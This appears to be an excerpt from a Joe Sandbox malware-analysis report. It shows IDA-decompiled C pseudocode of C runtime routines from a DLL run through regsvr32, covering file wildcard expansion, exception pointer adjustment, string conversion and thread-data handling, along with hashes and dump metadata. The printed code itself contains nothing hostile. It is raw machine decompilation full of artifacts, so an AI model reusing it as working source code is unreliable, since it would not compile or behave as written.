    				signed int* _t292;
    				signed int _t293;
    				signed int _t295;
    				signed int _t296;
    				signed int _t297;
    				signed int _t299;
    				void* _t300;
    				void* _t301;
    				signed int _t302;
    				void* _t306;
    				signed int _t307;
    				void* _t308;
    				void* _t309;
    				void* _t310;
    				signed int _t311;
    				void* _t312;
    				void* _t313;
    
    				_t131 = _a8;
    				_t309 = _t308 - 0x28;
    				_push(__esi);
    				_t317 = _t131;
    				if(_t131 != 0) {
    					_t292 = _a4;
    					_t222 = 0;
    					 *_t131 = 0;
    					_t283 = 0;
    					_t132 =  *_t292;
    					_t232 = 0;
    					_v608.cAlternateFileName = 0;
    					_v40 = 0;
    					_v36 = 0;
    					__eflags = _t132;
    					if(_t132 == 0) {
    						L9:
    						_v8 = _t222;
    						_t134 = _t232 - _t283;
    						_t293 = _t283;
    						_v12 = _t293;
    						_t271 = (_t134 >> 2) + 1;
    						_t136 = _t134 + 3 >> 2;
    						__eflags = _t232 - _t293;
    						_v16 = (_t134 >> 2) + 1;
    						asm("sbb esi, esi");
    						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
    						__eflags = _t295;
    						if(_t295 != 0) {
    							_t213 = _t283;
    							_t280 = _t222;
    							do {
    								_t264 =  *_t213;
    								_t20 = _t264 + 1; // 0x1
    								_v20 = _t20;
    								do {
    									_t215 =  *_t264;
    									_t264 = _t264 + 1;
    									__eflags = _t215;
    								} while (_t215 != 0);
    								_t222 = _t222 + 1 + _t264 - _v20;
    								_t213 = _v12 + 4;
    								_t280 = _t280 + 1;
    								_v12 = _t213;
    								__eflags = _t280 - _t295;
    							} while (_t280 != _t295);
    							_t271 = _v16;
    							_v8 = _t222;
    							_t222 = 0;
    							__eflags = 0;
    						}
    						_t296 = E6E9ECC22(_t136, _t271, _v8, 1);
    						_t310 = _t309 + 0xc;
    						__eflags = _t296;
    						if(_t296 != 0) {
    							_v12 = _t283;
    							_t139 = _t296 + _v16 * 4;
    							_t233 = _t139;
    							_v28 = _t139;
    							_t140 = _t283;
    							_v16 = _t233;
    							__eflags = _t140 - _v40;
    							if(_t140 == _v40) {
    								L24:
    								_v12 = _t222;
    								 *_a8 = _t296;
    								_t297 = _t222;
    								goto L25;
    							} else {
    								_t274 = _t296 - _t283;
    								__eflags = _t274;
    								_v32 = _t274;
    								do {
    									_t150 =  *_t140;
    									_t275 = _t150;
    									_v24 = _t150;
    									_v20 = _t275 + 1;
    									do {
    										_t152 =  *_t275;
    										_t275 = _t275 + 1;
    										__eflags = _t152;
    									} while (_t152 != 0);
    									_t153 = _t275 - _v20 + 1;
    									_push(_t153);
    									_v20 = _t153;
    									_t157 = E6E9F2161(_t233, _v28 - _t233 + _v8, _v24);
    									_t310 = _t310 + 0x10;
    									__eflags = _t157;
    									if(_t157 != 0) {
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										E6E9EC27C();
    										asm("int3");
    										_t306 = _t310;
    										_push(_t233);
    										_t239 = _v72;
    										_t65 = _t239 + 1; // 0x1
    										_t277 = _t65;
    										do {
    											_t159 =  *_t239;
    											_t239 = _t239 + 1;
    											__eflags = _t159;
    										} while (_t159 != 0);
    										_push(_t283);
    										_t285 = _a8;
    										_t241 = _t239 - _t277 + 1;
    										_v12 = _t241;
    										__eflags = _t241 -  !_t285;
    										if(_t241 <=  !_t285) {
    											_push(_t222);
    											_push(_t296);
    											_t68 = _t285 + 1; // 0x1
    											_t225 = _t68 + _t241;
    											_t300 = E6E9EDC48(_t225, 1);
    											__eflags = _t285;
    											if(_t285 == 0) {
    												L40:
    												_push(_v12);
    												_t225 = _t225 - _t285;
    												_t164 = E6E9F2161(_t300 + _t285, _t225, _v0);
    												_t311 = _t310 + 0x10;
    												__eflags = _t164;
    												if(_t164 != 0) {
    													goto L45;
    												} else {
    													_t229 = _a12;
    													_t206 = E6E9EF185(_t229);
    													_v12 = _t206;
    													__eflags = _t206;
    													if(_t206 == 0) {
    														 *( *(_t229 + 4)) = _t300;
    														_t302 = 0;
    														_t77 = _t229 + 4;
    														 *_t77 =  *(_t229 + 4) + 4;
    														__eflags =  *_t77;
    													} else {
    														E6E9EDC0E(_t300);
    														_t302 = _v12;
    													}
    													E6E9EDC0E(0);
    													_t209 = _t302;
    													goto L37;
    												}
    											} else {
    												_push(_t285);
    												_t211 = E6E9F2161(_t300, _t225, _a4);
    												_t311 = _t310 + 0x10;
    												__eflags = _t211;
    												if(_t211 != 0) {
    													L45:
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													E6E9EC27C();
    													asm("int3");
    													_push(_t306);
    													_t307 = _t311;
    													_t312 = _t311 - 0x298;
    													_t166 =  *0x6e9fc024; // 0x45ebcfb3
    													_v124 = _t166 ^ _t307;
    													_t244 = _v108;
    													_t278 = _v104;
    													_push(_t225);
    													_push(0);
    													_t287 = _v112;
    													_v724 = _t278;
    													__eflags = _t244 - _t287;
    													if(_t244 != _t287) {
    														while(1) {
    															_t204 =  *_t244;
    															__eflags = _t204 - 0x2f;
    															if(_t204 == 0x2f) {
    																break;
    															}
    															__eflags = _t204 - 0x5c;
    															if(_t204 != 0x5c) {
    																__eflags = _t204 - 0x3a;
    																if(_t204 != 0x3a) {
    																	_t244 = E6E9F21B0(_t287, _t244);
    																	__eflags = _t244 - _t287;
    																	if(_t244 != _t287) {
    																		continue;
    																	}
    																}
    															}
    															break;
    														}
    														_t278 = _v616;
    													}
    													_t168 =  *_t244;
    													_v609 = _t168;
    													__eflags = _t168 - 0x3a;
    													if(_t168 != 0x3a) {
    														L56:
    														_t226 = 0;
    														__eflags = _t168 - 0x2f;
    														if(__eflags == 0) {
    															L59:
    															_t169 = 1;
    														} else {
    															__eflags = _t168 - 0x5c;
    															if(__eflags == 0) {
    																goto L59;
    															} else {
    																__eflags = _t168 - 0x3a;
    																_t169 = 0;
    																if(__eflags == 0) {
    																	goto L59;
    																}
    															}
    														}
    														_v676 = _t226;
    														_v672 = _t226;
    														_push(_t300);
    														asm("sbb eax, eax");
    														_v668 = _t226;
    														_v664 = _t226;
    														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
    														_v660 = _t226;
    														_v656 = _t226;
    														_t175 = E6E9EEB7E(_t244 - _t287 + 1, _t287,  &_v676, E6E9EF092(_t278, __eflags));
    														_t313 = _t312 + 0xc;
    														asm("sbb eax, eax");
    														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
    														_t301 = _t179;
    														__eflags = _t301 - 0xffffffff;
    														if(_t301 != 0xffffffff) {
    															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
    															__eflags = _t249;
    															_v648 = _t249 >> 2;
    															do {
    																_v640 = _t226;
    																_v636 = _t226;
    																_v632 = _t226;
    																_v628 = _t226;
    																_v624 = _t226;
    																_v620 = _t226;
    																_t185 = E6E9EEAAF( &(_v608.cFileName),  &_v640,  &_v609, E6E9EF092(_t278, __eflags));
    																_t313 = _t313 + 0x10;
    																asm("sbb eax, eax");
    																_t188 =  !( ~_t185) & _v632;
    																__eflags =  *_t188 - 0x2e;
    																if( *_t188 != 0x2e) {
    																	L67:
    																	_push(_v616);
    																	_push(_v644);
    																	_push(_t287);
    																	_push(_t188);
    																	L33();
    																	_t313 = _t313 + 0x10;
    																	_v652 = _t188;
    																	__eflags = _t188;
    																	if(_t188 != 0) {
    																		__eflags = _v620 - _t226;
    																		if(_v620 != _t226) {
    																			E6E9EDC0E(_v632);
    																			_t188 = _v652;
    																		}
    																		_t226 = _t188;
    																	} else {
    																		goto L68;
    																	}
    																} else {
    																	_t255 =  *((intOrPtr*)(_t188 + 1));
    																	__eflags = _t255;
    																	if(_t255 == 0) {
    																		goto L68;
    																	} else {
    																		__eflags = _t255 - 0x2e;
    																		if(_t255 != 0x2e) {
    																			goto L67;
    																		} else {
    																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
    																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
    																				goto L68;
    																			} else {
    																				goto L67;
    																			}
    																		}
    																	}
    																}
    																L76:
    																FindClose(_t301);
    																goto L77;
    																L68:
    																__eflags = _v620 - _t226;
    																if(_v620 != _t226) {
    																	E6E9EDC0E(_v632);
    																}
    																__eflags = FindNextFileW(_t301,  &_v608);
    															} while (__eflags != 0);
    															_t196 = _v616;
    															_t257 = _v648;
    															_t278 =  *_t196;
    															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
    															__eflags = _t257 - _t199;
    															if(_t257 != _t199) {
    																E6E9F1BC0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E6E9EE9E5);
    															}
    															goto L76;
    														} else {
    															_push(_v616);
    															_push(_t226);
    															_push(_t226);
    															_push(_t287);
    															L33();
    															_t226 = _t179;
    														}
    														L77:
    														__eflags = _v656;
    														_pop(_t300);
    														if(_v656 != 0) {
    															E6E9EDC0E(_v668);
    														}
    														_t190 = _t226;
    													} else {
    														_t190 = _t287 + 1;
    														__eflags = _t244 - _t287 + 1;
    														if(_t244 == _t287 + 1) {
    															_t168 = _v609;
    															goto L56;
    														} else {
    															_push(_t278);
    															_push(0);
    															_push(0);
    															_push(_t287);
    															L33();
    														}
    													}
    													_pop(_t288);
    													__eflags = _v16 ^ _t307;
    													_pop(_t227);
    													return E6E9E9ADF(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
    												} else {
    													goto L40;
    												}
    											}
    										} else {
    											_t209 = 0xc;
    											L37:
    											return _t209;
    										}
    									} else {
    										goto L23;
    									}
    									goto L81;
    									L23:
    									_t212 = _v12;
    									_t263 = _v16;
    									 *((intOrPtr*)(_v32 + _t212)) = _t263;
    									_t140 = _t212 + 4;
    									_t233 = _t263 + _v20;
    									_v16 = _t233;
    									_v12 = _t140;
    									__eflags = _t140 - _v40;
    								} while (_t140 != _v40);
    								goto L24;
    							}
    						} else {
    							_t297 = _t296 | 0xffffffff;
    							_v12 = _t297;
    							L25:
    							E6E9EDC0E(_t222);
    							_pop(_t234);
    							goto L26;
    						}
    					} else {
    						while(1) {
    							_v8 = 0x3f2a;
    							_v6 = _t222;
    							_t217 = E6E9F2170(_t132,  &_v8);
    							_t234 =  *_t292;
    							__eflags = _t217;
    							if(_t217 != 0) {
    								_push( &(_v608.cAlternateFileName));
    								_push(_t217);
    								_push(_t234);
    								L46();
    								_t309 = _t309 + 0xc;
    								_v12 = _t217;
    								_t297 = _t217;
    							} else {
    								_t218 =  &(_v608.cAlternateFileName);
    								_push(_t218);
    								_push(_t222);
    								_push(_t222);
    								_push(_t234);
    								L33();
    								_t297 = _t218;
    								_t309 = _t309 + 0x10;
    								_v12 = _t297;
    							}
    							__eflags = _t297;
    							if(_t297 != 0) {
    								break;
    							}
    							_t292 =  &(_a4[1]);
    							_a4 = _t292;
    							_t132 =  *_t292;
    							__eflags = _t132;
    							if(_t132 != 0) {
    								continue;
    							} else {
    								_t283 = _v608.cAlternateFileName;
    								_t232 = _v40;
    								goto L9;
    							}
    							goto L81;
    						}
    						_t283 = _v608.cAlternateFileName;
    						L26:
    						_t272 = _t283;
    						_v32 = _t272;
    						__eflags = _v40 - _t272;
    						asm("sbb ecx, ecx");
    						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
    						__eflags = _t236;
    						_v28 = _t236;
    						if(_t236 != 0) {
    							_t299 = _t236;
    							do {
    								E6E9EDC0E( *_t283);
    								_t222 = _t222 + 1;
    								_t283 = _t283 + 4;
    								__eflags = _t222 - _t299;
    							} while (_t222 != _t299);
    							_t283 = _v608.cAlternateFileName;
    							_t297 = _v12;
    						}
    						E6E9EDC0E(_t283);
    						goto L31;
    					}
    				} else {
    					_t219 = E6E9ED46D(_t317);
    					_t297 = 0x16;
    					 *_t219 = _t297;
    					E6E9EC24F();
    					L31:
    					return _t297;
    				}
    				L81:
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: 939c668b89eb78b1771427d9910a47cc5a2598c9164f03a6bbd27ebda0841c17
    • Instruction ID: 281f2fa580f1972745f4398691731440407b0cee76191dfe4d0564099d8e448c
    • Opcode Fuzzy Hash: 939c668b89eb78b1771427d9910a47cc5a2598c9164f03a6bbd27ebda0841c17
    • Instruction Fuzzy Hash: 98615975E002199FDB16CFA8C8819EEBBF9EF88314B14856AD915E7704E731EE418F90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E6E9EAE74(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				signed int* _t52;
    				signed int _t53;
    				intOrPtr _t54;
    				signed int _t58;
    				signed int _t61;
    				intOrPtr _t71;
    				signed int _t75;
    				signed int _t79;
    				signed int _t81;
    				signed int _t84;
    				signed int _t85;
    				signed int _t97;
    				signed int* _t98;
    				signed char* _t101;
    				signed int _t107;
    				void* _t111;
    
    				_push(0x10);
    				_push(0x6e9fa770);
    				E6E9E9960(__ebx, __edi, __esi);
    				_t75 = 0;
    				_t52 =  *(_t111 + 0x10);
    				_t81 = _t52[1];
    				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
    					L30:
    					_t53 = 0;
    					__eflags = 0;
    					goto L31;
    				} else {
    					_t97 = _t52[2];
    					if(_t97 != 0 ||  *_t52 < 0) {
    						_t84 =  *_t52;
    						_t107 =  *(_t111 + 0xc);
    						if(_t84 >= 0) {
    							_t107 = _t107 + 0xc + _t97;
    						}
    						 *(_t111 - 4) = _t75;
    						_t101 =  *(_t111 + 0x14);
    						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
    							L10:
    							_t54 =  *((intOrPtr*)(_t111 + 8));
    							__eflags = _t84 & 0x00000008;
    							if((_t84 & 0x00000008) == 0) {
    								__eflags =  *_t101 & 0x00000001;
    								if(( *_t101 & 0x00000001) == 0) {
    									_t84 =  *(_t54 + 0x18);
    									__eflags = _t101[0x18] - _t75;
    									if(_t101[0x18] != _t75) {
    										__eflags = _t84;
    										if(_t84 == 0) {
    											goto L32;
    										} else {
    											__eflags = _t107;
    											if(_t107 == 0) {
    												goto L32;
    											} else {
    												__eflags =  *_t101 & 0x00000004;
    												_t79 = 0;
    												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
    												__eflags = _t75;
    												 *(_t111 - 0x20) = _t75;
    												goto L29;
    											}
    										}
    									} else {
    										__eflags = _t84;
    										if(_t84 == 0) {
    											goto L32;
    										} else {
    											__eflags = _t107;
    											if(_t107 == 0) {
    												goto L32;
    											} else {
    												E6E9E9DB0(_t107, E6E9EAC5A(_t84,  &(_t101[8])), _t101[0x14]);
    												goto L29;
    											}
    										}
    									}
    								} else {
    									__eflags =  *(_t54 + 0x18);
    									if( *(_t54 + 0x18) == 0) {
    										goto L32;
    									} else {
    										__eflags = _t107;
    										if(_t107 == 0) {
    											goto L32;
    										} else {
    											E6E9E9DB0(_t107,  *(_t54 + 0x18), _t101[0x14]);
    											__eflags = _t101[0x14] - 4;
    											if(_t101[0x14] == 4) {
    												__eflags =  *_t107;
    												if( *_t107 != 0) {
    													_push( &(_t101[8]));
    													_push( *_t107);
    													goto L21;
    												}
    											}
    											goto L29;
    										}
    									}
    								}
    							} else {
    								_t84 =  *(_t54 + 0x18);
    								goto L12;
    							}
    						} else {
    							_t71 =  *0x6e9fd368; // 0x0
    							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
    							if(_t71 == 0) {
    								goto L10;
    							} else {
    								 *0x6e9f51b8();
    								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
    								L12:
    								if(_t84 == 0 || _t107 == 0) {
    									L32:
    									E6E9ED547(_t75, _t84, _t97, _t101, _t107);
    									asm("int3");
    									_push(8);
    									_push(0x6e9fa790);
    									E6E9E9960(_t75, _t101, _t107);
    									_t98 =  *(_t111 + 0x10);
    									_t85 =  *(_t111 + 0xc);
    									__eflags =  *_t98;
    									if(__eflags >= 0) {
    										_t103 = _t85 + 0xc + _t98[2];
    										__eflags = _t85 + 0xc + _t98[2];
    									} else {
    										_t103 = _t85;
    									}
    									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
    									_t108 =  *(_t111 + 0x14);
    									_push( *(_t111 + 0x14));
    									_push(_t98);
    									_push(_t85);
    									_t77 =  *((intOrPtr*)(_t111 + 8));
    									_push( *((intOrPtr*)(_t111 + 8)));
    									_t58 = E6E9EAE74(_t77, _t103, _t108, __eflags) - 1;
    									__eflags = _t58;
    									if(_t58 == 0) {
    										_t61 = E6E9EBB74(_t103, _t108[0x18], E6E9EAC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
    									} else {
    										_t61 = _t58 - 1;
    										__eflags = _t61;
    										if(_t61 == 0) {
    											_t61 = E6E9EBB84(_t103, _t108[0x18], E6E9EAC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
    										}
    									}
    									 *(_t111 - 4) = 0xfffffffe;
    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
    									return _t61;
    								} else {
    									 *_t107 = _t84;
    									_push( &(_t101[8]));
    									_push(_t84);
    									L21:
    									 *_t107 = E6E9EAC5A();
    									L29:
    									 *(_t111 - 4) = 0xfffffffe;
    									_t53 = _t75;
    									L31:
    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
    									return _t53;
    								}
    							}
    						}
    					} else {
    						goto L30;
    					}
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: fdb29b57b3eebda42ff5a1f680b83c5908f8a26f0dc6d3bfbb2942a60244843a
    • Instruction ID: bdfd3962fb167fecf520b6702de0c2b4326775ae55bffdb29cdd9afb1e489efe
    • Opcode Fuzzy Hash: fdb29b57b3eebda42ff5a1f680b83c5908f8a26f0dc6d3bfbb2942a60244843a
    • Instruction Fuzzy Hash: B151D2B2504706AFDB1B8FD1D850BAA77B8EF44314F104A2DEA1547AA4E7B1E881CF90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9EEAAF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
    				intOrPtr _t16;
    				intOrPtr _t17;
    				intOrPtr _t19;
    				intOrPtr _t29;
    				char _t31;
    				intOrPtr _t38;
    				intOrPtr* _t40;
    				intOrPtr _t41;
    
    				_t40 = _a4;
    				if(_t40 != 0) {
    					_t31 = 0;
    					__eflags =  *_t40;
    					if( *_t40 != 0) {
    						_t16 = E6E9EFCA5(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
    						__eflags = _t16;
    						if(__eflags != 0) {
    							_t38 = _a8;
    							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
    							if(__eflags <= 0) {
    								L11:
    								_t17 = E6E9EFCA5(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
    								__eflags = _t17;
    								if(__eflags != 0) {
    									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
    									_t19 = 0;
    									__eflags = 0;
    								} else {
    									E6E9ED437(GetLastError());
    									_t19 =  *((intOrPtr*)(E6E9ED46D(__eflags)));
    								}
    								L14:
    								return _t19;
    							}
    							_t19 = E6E9EF0EB(_t38, __eflags, _t16);
    							__eflags = _t19;
    							if(_t19 != 0) {
    								goto L14;
    							}
    							goto L11;
    						}
    						E6E9ED437(GetLastError());
    						return  *((intOrPtr*)(E6E9ED46D(__eflags)));
    					}
    					_t41 = _a8;
    					__eflags =  *((intOrPtr*)(_t41 + 0xc));
    					if(__eflags != 0) {
    						L6:
    						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
    						L2:
    						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
    						return 0;
    					}
    					_t29 = E6E9EF0EB(_t41, __eflags, 1);
    					__eflags = _t29;
    					if(_t29 != 0) {
    						return _t29;
    					}
    					goto L6;
    				}
    				_t41 = _a8;
    				E6E9EF0D1(_t41);
    				_t31 = 0;
    				 *((intOrPtr*)(_t41 + 8)) = 0;
    				 *((intOrPtr*)(_t41 + 0xc)) = 0;
    				goto L2;
    			}

    APIs
      • Part of subcall function 6E9EF0D1: _free.LIBCMT ref: 6E9EF0DF
      • Part of subcall function 6E9EFCA5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6E9EE286,6E9F12A9,0000FDE9,00000000,?,?,?,6E9F1022,0000FDE9,00000000,?), ref: 6E9EFD51
    • GetLastError.KERNEL32 ref: 6E9EEB17
    • __dosmaperr.LIBCMT ref: 6E9EEB1E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E9EEB5D
    • __dosmaperr.LIBCMT ref: 6E9EEB64
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: 8de9e3486de3f4f38312ac5bfc8f53e4a52a70ae4ba6404864fe61a81c6582f9
    • Instruction ID: 53f2e6e79a7748f1c23b096899726fd6b389ecea3f2955296dadf3302866230c
    • Opcode Fuzzy Hash: 8de9e3486de3f4f38312ac5bfc8f53e4a52a70ae4ba6404864fe61a81c6582f9
    • Instruction Fuzzy Hash: 3D21D871504605BFE7129FF69C80D57B7ACEF51368714891AFA2A93E90D730EC408F90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E6E9ED9BC(void* __ecx, void* __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t2;
    				long _t3;
    				intOrPtr _t5;
    				long _t6;
    				intOrPtr _t9;
    				long _t10;
    				signed int _t39;
    				signed int _t40;
    				void* _t43;
    				void* _t49;
    				signed int _t51;
    				signed int _t53;
    				signed int _t54;
    				long _t56;
    				long _t60;
    				long _t61;
    				void* _t65;
    
    				_t49 = __edx;
    				_t43 = __ecx;
    				_t60 = GetLastError();
    				_t2 =  *0x6e9fc110; // 0xffffffff
    				_t67 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E6E9EDF59(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t51 = E6E9EDC48(1, 0x364);
    						_pop(_t43);
    						__eflags = _t51;
    						if(__eflags != 0) {
    							__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t51);
    							if(__eflags != 0) {
    								E6E9ED7BE(_t51, 0x6e9fd850);
    								E6E9EDC0E(0);
    								_t65 = _t65 + 0xc;
    								goto L13;
    							} else {
    								_t39 = 0;
    								E6E9EDF59(__eflags,  *0x6e9fc110, 0);
    								_push(_t51);
    								goto L9;
    							}
    						} else {
    							_t39 = 0;
    							__eflags = 0;
    							E6E9EDF59(0,  *0x6e9fc110, 0);
    							_push(0);
    							L9:
    							E6E9EDC0E();
    							_pop(_t43);
    							goto L4;
    						}
    					}
    				} else {
    					_t51 = E6E9EDF1A(_t67, _t2);
    					if(_t51 == 0) {
    						_t2 =  *0x6e9fc110; // 0xffffffff
    						goto L6;
    					} else {
    						if(_t51 != 0xffffffff) {
    							L13:
    							_t39 = _t51;
    						} else {
    							L3:
    							_t39 = 0;
    							L4:
    							_t51 = _t39;
    						}
    					}
    				}
    				SetLastError(_t60);
    				asm("sbb edi, edi");
    				_t53 =  ~_t51 & _t39;
    				if(_t53 == 0) {
    					E6E9ED547(_t39, _t43, _t49, _t53, _t60);
    					asm("int3");
    					_t5 =  *0x6e9fc110; // 0xffffffff
    					_push(_t60);
    					__eflags = _t5 - 0xffffffff;
    					if(__eflags == 0) {
    						L22:
    						_t6 = E6E9EDF59(__eflags, _t5, 0xffffffff);
    						__eflags = _t6;
    						if(_t6 == 0) {
    							goto L31;
    						} else {
    							_t60 = E6E9EDC48(1, 0x364);
    							_pop(_t43);
    							__eflags = _t60;
    							if(__eflags != 0) {
    								__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t60);
    								if(__eflags != 0) {
    									E6E9ED7BE(_t60, 0x6e9fd850);
    									E6E9EDC0E(0);
    									_t65 = _t65 + 0xc;
    									goto L29;
    								} else {
    									E6E9EDF59(__eflags,  *0x6e9fc110, _t21);
    									_push(_t60);
    									goto L25;
    								}
    							} else {
    								E6E9EDF59(__eflags,  *0x6e9fc110, _t20);
    								_push(_t60);
    								L25:
    								E6E9EDC0E();
    								_pop(_t43);
    								goto L31;
    							}
    						}
    					} else {
    						_t60 = E6E9EDF1A(__eflags, _t5);
    						__eflags = _t60;
    						if(__eflags == 0) {
    							_t5 =  *0x6e9fc110; // 0xffffffff
    							goto L22;
    						} else {
    							__eflags = _t60 - 0xffffffff;
    							if(_t60 == 0xffffffff) {
    								L31:
    								E6E9ED547(_t39, _t43, _t49, _t53, _t60);
    								asm("int3");
    								_push(_t39);
    								_push(_t60);
    								_push(_t53);
    								_t61 = GetLastError();
    								_t9 =  *0x6e9fc110; // 0xffffffff
    								__eflags = _t9 - 0xffffffff;
    								if(__eflags == 0) {
    									L38:
    									_t10 = E6E9EDF59(__eflags, _t9, 0xffffffff);
    									__eflags = _t10;
    									if(_t10 == 0) {
    										goto L35;
    									} else {
    										_t54 = E6E9EDC48(1, 0x364);
    										__eflags = _t54;
    										if(__eflags != 0) {
    											__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t54);
    											if(__eflags != 0) {
    												E6E9ED7BE(_t54, 0x6e9fd850);
    												E6E9EDC0E(0);
    												goto L45;
    											} else {
    												_t40 = 0;
    												E6E9EDF59(__eflags,  *0x6e9fc110, 0);
    												_push(_t54);
    												goto L41;
    											}
    										} else {
    											_t40 = 0;
    											__eflags = 0;
    											E6E9EDF59(0,  *0x6e9fc110, 0);
    											_push(0);
    											L41:
    											E6E9EDC0E();
    											goto L36;
    										}
    									}
    								} else {
    									_t54 = E6E9EDF1A(__eflags, _t9);
    									__eflags = _t54;
    									if(__eflags == 0) {
    										_t9 =  *0x6e9fc110; // 0xffffffff
    										goto L38;
    									} else {
    										__eflags = _t54 - 0xffffffff;
    										if(_t54 != 0xffffffff) {
    											L45:
    											_t40 = _t54;
    										} else {
    											L35:
    											_t40 = 0;
    											__eflags = 0;
    											L36:
    											_t54 = _t40;
    										}
    									}
    								}
    								SetLastError(_t61);
    								asm("sbb edi, edi");
    								_t56 =  ~_t54 & _t40;
    								__eflags = _t56;
    								return _t56;
    							} else {
    								L29:
    								__eflags = _t60;
    								if(_t60 == 0) {
    									goto L31;
    								} else {
    									return _t60;
    								}
    							}
    						}
    					}
    				} else {
    					return _t53;
    				}
    			}
























    APIs
    • GetLastError.KERNEL32(?,?,?,6E9F0D69,?,00000001,6E9EE2F7,?,6E9F1223,00000001,?,?,?,6E9EE286,?,00000000), ref: 6E9ED9C1
    • _free.LIBCMT ref: 6E9EDA1E
    • _free.LIBCMT ref: 6E9EDA54
    • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E9F1223,00000001,?,?,?,6E9EE286,?,00000000,00000000,6E9FA968,0000002C,6E9EE2F7), ref: 6E9EDA5F
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
